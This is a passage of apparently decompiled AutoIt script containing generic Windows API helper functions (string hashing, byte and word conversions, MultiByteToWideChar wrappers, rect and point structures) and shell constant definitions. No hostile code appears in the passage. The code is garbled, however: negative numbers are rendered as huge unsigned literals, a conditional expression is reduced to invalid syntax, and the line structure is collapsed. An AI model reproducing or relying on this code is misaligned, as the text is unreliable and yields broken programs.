) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN DLLSTRUCTGETDATA ($TDATA , 1 ) ENDFUNC FUNC _WINAPI_HASHSTRING ($SSTRING , $BCASESENSITIVE = TRUE , $ILENGTH = 32 ) LOCAL $ILENGTHS = STRINGLEN ($SSTRING ) IF NOT $ILENGTHS OR ($ILENGTH > 256 ) THEN RETURN SETERROR (12 , 0 , 0 ) LOCAL $TSTRING = DLLSTRUCTCREATE ("wchar[" & ($ILENGTHS + 1 ) & "]" ) IF NOT $BCASESENSITIVE THEN $SSTRING = STRINGLOWER ($SSTRING ) ENDIF DLLSTRUCTSETDATA ($TSTRING , 1 , $SSTRING ) LOCAL $SHASH = _WINAPI_HASHDATA ($TSTRING , 2 * $ILENGTHS , $ILENGTH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $SHASH ENDFUNC FUNC _WINAPI_HIBYTE ($IVALUE ) RETURN BITAND (BITSHIFT ($IVALUE , 8 ) , 255 ) ENDFUNC FUNC _WINAPI_HIDWORD ($IVALUE ) LOCAL $TINT64 = DLLSTRUCTCREATE ("int64" ) LOCAL $TQWORD = DLLSTRUCTCREATE ("dword;dword" , DLLSTRUCTGETPTR ($TINT64 ) ) DLLSTRUCTSETDATA ($TINT64 , 1 , $IVALUE ) RETURN DLLSTRUCTGETDATA ($TQWORD , 2 ) ENDFUNC FUNC _WINAPI_HIWORD ($ILONG ) RETURN BITSHIFT ($ILONG , 16 ) ENDFUNC FUNC _WINAPI_INTTODWORD ($IVALUE ) LOCAL $TDATA = DLLSTRUCTCREATE ("dword" ) DLLSTRUCTSETDATA ($TDATA , 1 , $IVALUE ) RETURN DLLSTRUCTGETDATA ($TDATA , 1 ) ENDFUNC FUNC _WINAPI_INTTOFLOAT ($IINT ) LOCAL $TINT = DLLSTRUCTCREATE ("int" ) LOCAL $TFLOAT = DLLSTRUCTCREATE ("float" , DLLSTRUCTGETPTR ($TINT ) ) DLLSTRUCTSETDATA ($TINT , 1 , $IINT ) RETURN DLLSTRUCTGETDATA ($TFLOAT , 1 ) ENDFUNC FUNC _WINAPI_LOBYTE ($IVALUE ) RETURN BITAND ($IVALUE , 255 ) ENDFUNC FUNC _WINAPI_LODWORD ($IVALUE ) LOCAL $TINT64 = DLLSTRUCTCREATE ("int64" ) LOCAL $TQWORD = DLLSTRUCTCREATE ("dword;dword" , DLLSTRUCTGETPTR ($TINT64 ) ) DLLSTRUCTSETDATA ($TINT64 , 1 , $IVALUE ) RETURN DLLSTRUCTGETDATA ($TQWORD , 1 ) ENDFUNC FUNC _WINAPI_LOWORD ($ILONG ) RETURN BITAND ($ILONG , 65535 ) ENDFUNC FUNC _WINAPI_LONGMID ($IVALUE , $ISTART , $ICOUNT ) RETURN BITAND (BITSHIFT ($IVALUE , $ISTART ) , BITOR (BITSHIFT (BITSHIFT (2147483647 , 32 - ($ICOUNT + 1 ) ) , 1 ) , BITSHIFT (1 , - ($ICOUNT + 4294967295 ) ) ) ) ENDFUNC FUNC _WINAPI_MAKELANGID ($ILNGIDPRIMARY , $ILNGIDSUB ) RETURN BITOR (BITSHIFT ($ILNGIDSUB , + 4294967286 ) , $ILNGIDPRIMARY ) ENDFUNC FUNC _WINAPI_MAKELCID ($ILNGID , $ISORTID ) RETURN BITOR (BITSHIFT ($ISORTID , + 4294967280 ) , $ILNGID ) ENDFUNC FUNC _WINAPI_MAKELONG ($ILO , $IHI ) RETURN BITOR (BITSHIFT ($IHI , + 4294967280 ) , BITAND ($ILO , 65535 ) ) ENDFUNC FUNC _WINAPI_MAKEQWORD ($ILODWORD , $IHIDWORD ) LOCAL $TINT64 = DLLSTRUCTCREATE ("uint64" ) LOCAL $TDWORDS = DLLSTRUCTCREATE ("dword;dword" , DLLSTRUCTGETPTR ($TINT64 ) ) DLLSTRUCTSETDATA ($TDWORDS , 1 , $ILODWORD ) DLLSTRUCTSETDATA ($TDWORDS , 2 , $IHIDWORD ) RETURN DLLSTRUCTGETDATA ($TINT64 , 1 ) ENDFUNC FUNC _WINAPI_MAKEWORD ($ILO , $IHI ) LOCAL $TWORD = DLLSTRUCTCREATE ("ushort" ) LOCAL $TBYTE = DLLSTRUCTCREATE ("byte;byte" , DLLSTRUCTGETPTR ($TWORD ) ) DLLSTRUCTSETDATA ($TBYTE , 1 , $IHI ) DLLSTRUCTSETDATA ($TBYTE , 2 , $ILO ) RETURN DLLSTRUCTGETDATA ($TWORD , 1 ) ENDFUNC FUNC _WINAPI_MULTIBYTETOWIDECHAR ($VTEXT , $ICODEPAGE = 0 , $IFLAGS = 0 , $BRETSTRING = FALSE ) LOCAL $STEXTTYPE = "str" IF NOT ISSTRING ($VTEXT ) THEN $STEXTTYPE = "struct*" LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "int" , "MultiByteToWideChar" , "uint" , $ICODEPAGE , "dword" , $IFLAGS , $STEXTTYPE , $VTEXT , "int" , + 4294967295 , "ptr" , 0 , "int" , 0 ) IF @ERROR OR NOT $ARESULT [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $IOUT = $ARESULT [0 ] LOCAL $TOUT = DLLSTRUCTCREATE ("wchar[" & $IOUT & "]" ) $ARESULT = DLLCALL ("kernel32.dll" , "int" , "MultiByteToWideChar" , "uint" , $ICODEPAGE , "dword" , $IFLAGS , $STEXTTYPE , $VTEXT , "int" , + 4294967295 , "struct*" , $TOUT , "int" , $IOUT ) IF @ERROR OR NOT $ARESULT [0 ] THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , 0 ) IF $BRETSTRING THEN RETURN DLLSTRUCTGETDATA ($TOUT , 1 ) RETURN $TOUT ENDFUNC FUNC _WINAPI_MULTIBYTETOWIDECHAREX ($STEXT , $PTEXT , $ICODEPAGE = 0 , $IFLAGS = 0 ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "int" , "MultiByteToWideChar" , "uint" , $ICODEPAGE , "dword" , $IFLAGS , "STR" , $STEXT , "int" , + 4294967295 , "struct*" , $PTEXT , "int" , (STRINGLEN ($STEXT ) + 1 ) * 2 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_OEMTOCHAR ($SSTR ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "OemToChar" , "str" , $SSTR , "str" , "" ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , "" ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_POINTFROMRECT (BYREF $TRECT , $BCENTER = TRUE ) LOCAL $IX1 = DLLSTRUCTGETDATA ($TRECT , "Left" ) LOCAL $IY1 = DLLSTRUCTGETDATA ($TRECT , "Top" ) LOCAL $IX2 = DLLSTRUCTGETDATA ($TRECT , "Right" ) LOCAL $IY2 = DLLSTRUCTGETDATA ($TRECT , "Bottom" ) IF $BCENTER THEN $IX1 = $IX1 + (($IX2 - $IX1 ) / 2 ) $IY1 = $IY1 + (($IY2 - $IY1 ) / 2 ) ENDIF LOCAL $TPOINT = DLLSTRUCTCREATE ($TAGPOINT ) DLLSTRUCTSETDATA ($TPOINT , "X" , $IX1 ) DLLSTRUCTSETDATA ($TPOINT , "Y" , $IY1 ) RETURN $TPOINT ENDFUNC FUNC _WINAPI_PRIMARYLANGID ($ILNGID ) RETURN BITAND ($ILNGID , 1023 ) ENDFUNC FUNC _WINAPI_SCREENTOCLIENT ($HWND , BYREF $TPOINT ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "ScreenToClient" , "hwnd" , $HWND , "struct*" , $TPOINT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SHORTTOWORD ($IVALUE ) RETURN BITAND ($IVALUE , 65535 ) ENDFUNC FUNC _WINAPI_STRFORMATBYTESIZE ($ISIZE ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "ptr" , "StrFormatByteSizeW" , "int64" , $ISIZE , "wstr" , "" , "uint" , 1024 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , "" ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_STRFORMATBYTESIZEEX ($ISIZE ) LOCAL $ASYMBOL = DLLCALL ("kernel32.dll" , "int" , "GetLocaleInfoW" , "dword" , 1024 , "dword" , 15 , "wstr" , "" , "int" , 2048 ) IF @ERROR THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , "" ) LOCAL $SSIZE = _WINAPI_STRFORMATBYTESIZE (0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN STRINGREPLACE ($SSIZE , "0" , STRINGREGEXPREPLACE (NUMBER ($ISIZE ) , "(?<=\d)(?=(\d{3})+\z)" , $ASYMBOL [3 ] ) ) ENDFUNC FUNC _WINAPI_STRFORMATKBSIZE ($ISIZE ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "ptr" , "StrFormatKBSizeW" , "int64" , $ISIZE , "wstr" , "" , "uint" , 1024 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , "" ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_STRFROMTIMEINTERVAL ($ITIME , $IDIGITS = 7 ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "int" , "StrFromTimeIntervalW" , "wstr" , "" , "uint" , 1024 , "dword" , $ITIME , "int" , $IDIGITS ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , "" ) RETURN STRINGSTRIPWS ($ARET [1 ] , $STR_STRIPLEADING + $STR_STRIPTRAILING ) ENDFUNC FUNC _WINAPI_STRINGFROMGUID ($TGUID ) LOCAL $ARESULT = DLLCALL ("ole32.dll" , "int" , "StringFromGUID2" , "struct*" , $TGUID , "wstr" , "" , "int" , 40 ) IF @ERROR OR NOT $ARESULT [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN SETEXTENDED ($ARESULT [0 ] , $ARESULT [2 ] ) ENDFUNC FUNC _WINAPI_SUBLANGID ($ILNGID ) RETURN BITSHIFT ($ILNGID , 10 ) ENDFUNC FUNC _WINAPI_SWAPDWORD ($IVALUE ) LOCAL $TSTRUCT1 = DLLSTRUCTCREATE ("dword;dword" ) LOCAL $TSTRUCT2 = DLLSTRUCTCREATE ("byte[4];byte[4]" , DLLSTRUCTGETPTR ($TSTRUCT1 ) ) DLLSTRUCTSETDATA ($TSTRUCT1 , 1 , $IVALUE ) FOR $I = 1 TO 4 DLLSTRUCTSETDATA ($TSTRUCT2 , 2 , DLLSTRUCTGETDATA ($TSTRUCT2 , 1 , 5 - $I ) , $I ) NEXT RETURN DLLSTRUCTGETDATA ($TSTRUCT1 , 2 ) ENDFUNC FUNC _WINAPI_SWAPQWORD ($IVALUE ) LOCAL $TSTRUCT1 = DLLSTRUCTCREATE ("int64;int64" ) LOCAL $TSTRUCT2 = DLLSTRUCTCREATE ("byte[8];byte[8]" , DLLSTRUCTGETPTR ($TSTRUCT1 ) ) DLLSTRUCTSETDATA ($TSTRUCT1 , 1 , $IVALUE ) FOR $I = 1 TO 8 DLLSTRUCTSETDATA ($TSTRUCT2 , 2 , DLLSTRUCTGETDATA ($TSTRUCT2 , 1 , 9 - $I ) , $I ) NEXT RETURN DLLSTRUCTGETDATA ($TSTRUCT1 , 2 ) ENDFUNC FUNC _WINAPI_SWAPWORD ($IVALUE ) LOCAL $TSTRUCT1 = DLLSTRUCTCREATE ("word;word" ) LOCAL $TSTRUCT2 = DLLSTRUCTCREATE ("byte[2];byte[2]" , DLLSTRUCTGETPTR ($TSTRUCT1 ) ) DLLSTRUCTSETDATA ($TSTRUCT1 , 1 , $IVALUE ) FOR $I = 1 TO 2 DLLSTRUCTSETDATA ($TSTRUCT2 , 2 , DLLSTRUCTGETDATA ($TSTRUCT2 , 1 , 3 - $I ) , $I ) NEXT RETURN DLLSTRUCTGETDATA ($TSTRUCT1 , 2 ) ENDFUNC FUNC _WINAPI_WIDECHARTOMULTIBYTE ($VUNICODE , $ICODEPAGE = 0 , $BRETNOSTRUCT = TRUE , $BRETBINARY = FALSE ) LOCAL $SUNICODETYPE = "wstr" IF NOT ISSTRING ($VUNICODE ) THEN $SUNICODETYPE = "struct*" LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "int" , "WideCharToMultiByte" , "uint" , $ICODEPAGE , "dword" , 0 , $SUNICODETYPE , $VUNICODE , "int" , + 4294967295 , "ptr" , 0 , "int" , 0 , "ptr" , 0 , "ptr" , 0 ) IF @ERROR OR NOT $ARESULT [0 ] THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , "" ) LOCAL $TMULTIBYTE = DLLSTRUCTCREATE ((($BRETBINARY ) ("byte" ) ("char" ) ) & "[" & $ARESULT [0 ] & "]" ) $ARESULT = DLLCALL ("kernel32.dll" , "int" , "WideCharToMultiByte" , "uint" , $ICODEPAGE , "dword" , 0 , $SUNICODETYPE , $VUNICODE , "int" , + 4294967295 , "struct*" , $TMULTIBYTE , "int" , $ARESULT [0 ] , "ptr" , 0 , "ptr" , 0 ) IF @ERROR OR NOT $ARESULT [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , "" ) IF $BRETNOSTRUCT THEN RETURN DLLSTRUCTGETDATA ($TMULTIBYTE , 1 ) RETURN $TMULTIBYTE ENDFUNC FUNC _WINAPI_WORDTOSHORT ($IVALUE ) IF BITAND ($IVALUE , 32768 ) THEN RETURN BITOR ($IVALUE , 4294934528 ) ENDIF RETURN BITAND ($IVALUE , 32767 ) ENDFUNC #EndRegion Public Functions #Region Global Variables and Constants #EndRegion Global Variables and Constants #Region Functions list #EndRegion Functions list #Region Public Functions FUNC _WINAPI_ARRAYTOSTRUCT (CONST BYREF $ADATA , $ISTART = 0 , $IEND = + 4294967295 ) IF __CHECKERRORARRAYBOUNDS ($ADATA , $ISTART , $IEND ) THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $TAGSTRUCT = "" FOR $I = $ISTART TO $IEND $TAGSTRUCT &= "wchar[" & (STRINGLEN ($ADATA [$I ] ) + 1 ) & "];" NEXT LOCAL $TDATA = DLLSTRUCTCREATE ($TAGSTRUCT & "wchar[1]" ) LOCAL $ICOUNT = 1 FOR $I = $ISTART TO $IEND DLLSTRUCTSETDATA ($TDATA , $ICOUNT , $ADATA [$I ] ) $ICOUNT += 1 NEXT DLLSTRUCTSETDATA ($TDATA , $ICOUNT , CHRW (0 ) ) RETURN $TDATA ENDFUNC FUNC _WINAPI_CREATEMARGINS ($ILEFTWIDTH , $IRIGHTWIDTH , $ITOPHEIGHT , $IBOTTOMHEIGHT ) LOCAL $TMARGINS = DLLSTRUCTCREATE ($TAGMARGINS ) DLLSTRUCTSETDATA ($TMARGINS , 1 , $ILEFTWIDTH ) DLLSTRUCTSETDATA ($TMARGINS , 2 , $IRIGHTWIDTH ) DLLSTRUCTSETDATA ($TMARGINS , 3 , $ITOPHEIGHT ) DLLSTRUCTSETDATA ($TMARGINS , 4 , $IBOTTOMHEIGHT ) RETURN $TMARGINS ENDFUNC FUNC _WINAPI_CREATEPOINT ($IX , $IY ) LOCAL $TPOINT = DLLSTRUCTCREATE ($TAGPOINT ) DLLSTRUCTSETDATA ($TPOINT , 1 , $IX ) DLLSTRUCTSETDATA ($TPOINT , 2 , $IY ) RETURN $TPOINT ENDFUNC FUNC _WINAPI_CREATERECT ($ILEFT , $ITOP , $IRIGHT , $IBOTTOM ) LOCAL $TRECT = DLLSTRUCTCREATE ($TAGRECT ) DLLSTRUCTSETDATA ($TRECT , 1 , $ILEFT ) DLLSTRUCTSETDATA ($TRECT , 2 , $ITOP ) DLLSTRUCTSETDATA ($TRECT , 3 , $IRIGHT ) DLLSTRUCTSETDATA ($TRECT , 4 , $IBOTTOM ) RETURN $TRECT ENDFUNC FUNC _WINAPI_CREATERECTEX ($IX , $IY , $IWIDTH , $IHEIGHT ) LOCAL $TRECT = DLLSTRUCTCREATE ($TAGRECT ) DLLSTRUCTSETDATA ($TRECT , 1 , $IX ) DLLSTRUCTSETDATA ($TRECT , 2 , $IY ) DLLSTRUCTSETDATA ($TRECT , 3 , $IX + $IWIDTH ) DLLSTRUCTSETDATA ($TRECT , 4 , $IY + $IHEIGHT ) RETURN $TRECT ENDFUNC FUNC _WINAPI_CREATESIZE ($IWIDTH , $IHEIGHT ) LOCAL $TSIZE = DLLSTRUCTCREATE ($TAGSIZE ) DLLSTRUCTSETDATA ($TSIZE , 1 , $IWIDTH ) DLLSTRUCTSETDATA ($TSIZE , 2 , $IHEIGHT ) RETURN $TSIZE ENDFUNC FUNC _WINAPI_COPYSTRUCT ($TSTRUCT , $SSTRUCT = "" ) LOCAL $ISIZE = DLLSTRUCTGETSIZE ($TSTRUCT ) IF NOT $ISIZE THEN RETURN SETERROR (1 , 0 , 0 ) LOCAL $TRESULT IF NOT STRINGSTRIPWS ($SSTRUCT , $STR_STRIPLEADING + $STR_STRIPTRAILING + $STR_STRIPSPACES ) THEN $TRESULT = DLLSTRUCTCREATE ("byte[" & $ISIZE & "]" ) ELSE $TRESULT = DLLSTRUCTCREATE ($SSTRUCT ) ENDIF IF DLLSTRUCTGETSIZE ($TRESULT ) < $ISIZE THEN RETURN SETERROR (2 , 0 , 0 ) _WINAPI_MOVEMEMORY ($TRESULT , $TSTRUCT , $ISIZE ) RETURN $TRESULT ENDFUNC FUNC _WINAPI_GETEXTENDED () RETURN $__G_VEXT ENDFUNC FUNC _WINAPI_GETMOUSEPOS ($BTOCLIENT = FALSE , $HWND = 0 ) LOCAL $IMODE = OPT ("MouseCoordMode" , 1 ) LOCAL $APOS = MOUSEGETPOS () OPT ("MouseCoordMode" , $IMODE ) LOCAL $TPOINT = DLLSTRUCTCREATE ($TAGPOINT ) DLLSTRUCTSETDATA ($TPOINT , "X" , $APOS [0 ] ) DLLSTRUCTSETDATA ($TPOINT , "Y" , $APOS [1 ] ) IF $BTOCLIENT AND NOT _WINAPI_SCREENTOCLIENT ($HWND , $TPOINT ) THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , 0 ) RETURN $TPOINT ENDFUNC FUNC _WINAPI_GETMOUSEPOSX ($BTOCLIENT = FALSE , $HWND = 0 ) LOCAL $TPOINT = _WINAPI_GETMOUSEPOS ($BTOCLIENT , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN DLLSTRUCTGETDATA ($TPOINT , "X" ) ENDFUNC FUNC _WINAPI_GETMOUSEPOSY ($BTOCLIENT = FALSE , $HWND = 0 ) LOCAL $TPOINT = _WINAPI_GETMOUSEPOS ($BTOCLIENT , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN DLLSTRUCTGETDATA ($TPOINT , "Y" ) ENDFUNC FUNC _WINAPI_MULDIV ($INUMBER , $INUMERATOR , $IDENOMINATOR ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "int" , "MulDiv" , "int" , $INUMBER , "int" , $INUMERATOR , "int" , $IDENOMINATOR ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , + 4294967295 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_PLAYSOUND ($SSOUND , $IFLAGS = $SND_SYSTEM_NOSTOP , $HINSTANCE = 0 ) LOCAL $STYPEOFSOUND = "ptr" IF $SSOUND THEN IF ISSTRING ($SSOUND ) THEN $STYPEOFSOUND = "wstr" ENDIF ELSE $SSOUND = 0 $IFLAGS = 0 ENDIF LOCAL $ARET = DLLCALL ("winmm.dll" , "bool" , "PlaySoundW" , $STYPEOFSOUND , $SSOUND , "handle" , $HINSTANCE , "dword" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_STRINGLENA (CONST BYREF $TSTRING ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "int" , "lstrlenA" , "struct*" , $TSTRING ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_STRINGLENW (CONST BYREF $TSTRING ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "int" , "lstrlenW" , "struct*" , $TSTRING ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_STRUCTTOARRAY (BYREF $TSTRUCT , $IITEMS = 0 ) LOCAL $ISIZE = 2 * FLOOR (DLLSTRUCTGETSIZE ($TSTRUCT ) / 2 ) LOCAL $PSTRUCT = DLLSTRUCTGETPTR ($TSTRUCT ) IF NOT $ISIZE OR NOT $PSTRUCT THEN RETURN SETERROR (1 , 0 , 0 ) LOCAL $TDATA , $ILENGTH , $IOFFSET = 0 LOCAL $ARESULT [101 ] = [0 ] WHILE 1 $ILENGTH = _WINAPI_STRLEN ($PSTRUCT + $IOFFSET ) IF NOT $ILENGTH THEN EXITLOOP ENDIF IF 2 * (1 + $ILENGTH ) + $IOFFSET > $ISIZE THEN RETURN SETERROR (3 , 0 , 0 ) $TDATA = DLLSTRUCTCREATE ("wchar[" & (1 + $ILENGTH ) & "]" , $PSTRUCT + $IOFFSET ) IF @ERROR THEN RETURN SETERROR (@ERROR + 10 , 0 , 0 ) __INC ($ARESULT ) $ARESULT [$ARESULT [0 ] ] = DLLSTRUCTGETDATA ($TDATA , 1 ) IF $ARESULT [0 ] = $IITEMS THEN EXITLOOP ENDIF $IOFFSET += 2 * (1 + $ILENGTH ) IF $IOFFSET >= $ISIZE THEN RETURN SETERROR (3 , 0 , 0 ) WEND IF NOT $ARESULT [0 ] THEN RETURN SETERROR (2 , 0 , 0 ) __INC ($ARESULT , + 4294967295 ) RETURN $ARESULT ENDFUNC FUNC _WINAPI_UNIONSTRUCT ($TSTRUCT1 , $TSTRUCT2 , $SSTRUCT = "" ) LOCAL $ASIZE [2 ] = [DLLSTRUCTGETSIZE ($TSTRUCT1 ) , DLLSTRUCTGETSIZE ($TSTRUCT2 ) ] IF NOT $ASIZE [0 ] OR NOT $ASIZE [1 ] THEN RETURN SETERROR (1 , 0 , 0 ) LOCAL $TRESULT IF NOT STRINGSTRIPWS ($SSTRUCT , $STR_STRIPLEADING + $STR_STRIPTRAILING + $STR_STRIPSPACES ) THEN $TRESULT = DLLSTRUCTCREATE ("byte[" & ($ASIZE [0 ] + $ASIZE [1 ] ) & "]" ) ELSE $TRESULT = DLLSTRUCTCREATE ($SSTRUCT ) ENDIF IF DLLSTRUCTGETSIZE ($TRESULT ) < ($ASIZE [0 ] + $ASIZE [1 ] ) THEN RETURN SETERROR (2 , 0 , 0 ) _WINAPI_MOVEMEMORY ($TRESULT , $TSTRUCT1 , $ASIZE [0 ] ) _WINAPI_MOVEMEMORY (DLLSTRUCTGETPTR ($TRESULT ) + $ASIZE [0 ] , $TSTRUCT2 , $ASIZE [1 ] ) RETURN $TRESULT ENDFUNC #EndRegion Public Functions GLOBAL CONST $DLLVER_PLATFORM_WINDOWS = 1 GLOBAL CONST $DLLVER_PLATFORM_NT = 2 GLOBAL CONST $SHCNE_ALLEVENTS = 2147483647 GLOBAL CONST $SHCNE_ASSOCCHANGED = 134217728 GLOBAL CONST $SHCNE_ATTRIBUTES = 2048 GLOBAL CONST $SHCNE_CREATE = 2 GLOBAL CONST $SHCNE_DELETE = 4 GLOBAL CONST $SHCNE_DRIVEADD = 256 GLOBAL CONST $SHCNE_DRIVEADDGUI = 65536 GLOBAL CONST $SHCNE_DRIVEREMOVED = 128 GLOBAL CONST $SHCNE_EXTENDED_EVENT = 67108864 GLOBAL CONST $SHCNE_FREESPACE = 262144 GLOBAL CONST $SHCNE_MEDIAINSERTED = 32 GLOBAL CONST $SHCNE_MEDIAREMOVED = 64 GLOBAL CONST $SHCNE_MKDIR = 8 GLOBAL CONST $SHCNE_NETSHARE = 512 GLOBAL CONST $SHCNE_NETUNSHARE = 1024 GLOBAL CONST $SHCNE_RENAMEFOLDER = 131072 GLOBAL CONST $SHCNE_RENAMEITEM = 1 GLOBAL CONST $SHCNE_RMDIR = 16 GLOBAL CONST $SHCNE_SERVERDISCONNECT = 16384 GLOBAL CONST $SHCNE_UPDATEDIR = 4096 GLOBAL CONST $SHCNE_UPDATEIMAGE = 32768 GLOBAL CONST $SHCNE_UPDATEITEM = 8192 GLOBAL CONST $SHCNE_DISKEVENTS = 145439 GLOBAL CONST $SHCNE_GLOBALEVENTS = 201687520 GLOBAL CONST $SHCNE_INTERRUPT = 2147483648 GLOBAL CONST $SHCNF_DWORD = 3 GLOBAL CONST $SHCNF_IDLIST = 0 GLOBAL CONST $SHCNF_PATH = 1 GLOBAL CONST $SHCNF_PRINTER = 2 GLOBAL CONST $SHCNF_FLUSH = 4096 GLOBAL CONST $SHCNF_FLUSHNOWAIT = 8192 GLOBAL CONST $SHCNF_NOTIFYRECURSIVE = 65536 GLOBAL CONST $SHCNRF_INTERRUPTLEVEL = 1 GLOBAL CONST $SHCNRF_SHELLLEVEL = 2 GLOBAL CONST $SHCNRF_RECURSIVEINTERRUPT = 4096 GLOBAL CONST $SHCNRF_NEWDELIVERY = 32768 GLOBAL CONST $SHERB_NOCONFIRMATION = 1 GLOBAL CONST $SHERB_NOPROGRESSUI = 2 GLOBAL CONST $SHERB_NOSOUND = 4 GLOBAL CONST $SHERB_NO_UI = BITOR ($SHERB_NOCONFIRMATION , $SHERB_NOPROGRESSUI , $SHERB_NOSOUND ) GLOBAL CONST $SEE_MASK_DEFAULT = 0 GLOBAL CONST $SEE_MASK_CLASSNAME = 1 GLOBAL CONST $SEE_MASK_CLASSKEY = 3 GLOBAL CONST $SEE_MASK_IDLIST = 4 GLOBAL CONST $SEE_MASK_INVOKEIDLIST = 12 GLOBAL CONST $SEE_MASK_ICON = 16 GLOBAL CONST $SEE_MASK_HOTKEY = 32 GLOBAL CONST $SEE_MASK_NOCLOSEPROCESS = 64 GLOBAL CONST $SEE_MASK_CONNECTNETDRV = 128 GLOBAL CONST $SEE_MASK_NOASYNC = 256 GLOBAL CONST $SEE_MASK_FLAG_DDEWAIT = $SEE_MASK_NOASYNC GLOBAL CONST $SEE_MASK_DOENVSUBST = 512 GLOBAL CONST $SEE_MASK_FLAG_NO_UI = 1024 GLOBAL CONST $SEE_MASK_UNICODE = 16384 GLOBAL CONST $SEE_MASK_NO_CONSOLE = 32768 GLOBAL CONST $SEE_MASK_ASYNCOK = 1048576 GLOBAL CONST $SEE_MASK_NOQUERYCLASSSTORE = 16777216 GLOBAL CONST $SEE_MASK_HMONITOR = 2097152 GLOBAL CONST $SEE_MASK_NOZONECHECKS = 8388608 GLOBAL CONST $SEE_MASK_WAITFORINPUTIDLE = 33554432 GLOBAL CONST $SEE_MASK_FLAG_LOG_USAGE = 67108864 GLOBAL CONST $SE_ERR_ACCESSDENIED = 5 GLOBAL CONST $SE_ERR_ASSOCINCOMPLETE = 27 GLOBAL CONST $SE_ERR_DDEBUSY = 30 GLOBAL CONST $SE_ERR_DDEFAIL = 29 GLOBAL CONST $SE_ERR_DDETIMEOUT = 28 GLOBAL CONST $SE_ERR_DLLNOTFOUND = 32 GLOBAL CONST $SE_ERR_FNF = 2 GLOBAL CONST $SE_ERR_NOASSOC = 31 GLOBAL CONST $SE_ERR_OOM = 8 GLOBAL CONST $SE_ERR_PNF = 3 GLOBAL CONST $SE_ERR_SHARE = 26 GLOBAL CONST $FO_COPY = 2 GLOBAL CONST $FO_DELETE = 3 GLOBAL CONST $FO_MOVE = 1 GLOBAL CONST $FO_RENAME = 4 GLOBAL CONST $FOF_ALLOWUNDO = 64 GLOBAL CONST $FOF_CONFIRMMOUSE = 2 GLOBAL CONST $FOF_FILESONLY = 128 GLOBAL CONST $FOF_MULTIDESTFILES = 1 GLOBAL CONST $FOF_NOCONFIRMATION = 16 GLOBAL CONST $FOF_NOCONFIRMMKDIR = 512 GLOBAL CONST $FOF_NO_CONNECTED_ELEMENTS = 8192 GLOBAL CONST $FOF_NOCOPYSECURITYATTRIBS = 2048 GLOBAL CONST $FOF_NOERRORUI = 1024 GLOBAL CONST $FOF_NORECURSEREPARSE = 32768 GLOBAL CONST $FOF_NORECURSION = 4096 GLOBAL CONST $FOF_RENAMEONCOLLISION = 8 GLOBAL CONST $FOF_SILENT = 4 GLOBAL CONST $FOF_SIMPLEPROGRESS = 256 GLOBAL CONST $FOF_WANTMAPPINGHANDLE = 32 GLOBAL CONST $FOF_WANTNUKEWARNING = 16384 GLOBAL CONST $FOF_NO_UI = BITOR ($FOF_NOCONFIRMATION , $FOF_NOCONFIRMMKDIR , $FOF_NOERRORUI , $FOF_SILENT ) GLOBAL CONST $SHGFI_ADDOVERLAYS = 32 GLOBAL CONST $SHGFI_ATTR_SPECIFIED = 131072 GLOBAL CONST $SHGFI_ATTRIBUTES = 2048 GLOBAL CONST $SHGFI_DISPLAYNAME = 512 GLOBAL CONST $SHGFI_EXETYPE = 8192 GLOBAL CONST $SHGFI_ICON = 256 GLOBAL CONST $SHGFI_ICONLOCATION = 4096 GLOBAL CONST $SHGFI_LARGEICON = 0 GLOBAL CONST $SHGFI_LINKOVERLAY = 32768 GLOBAL CONST $SHGFI_OPENICON = 2 GLOBAL CONST $SHGFI_OVERLAYINDEX = 64 GLOBAL CONST $SHGFI_PIDL = 8 GLOBAL CONST $SHGFI_SELECTED = 65536 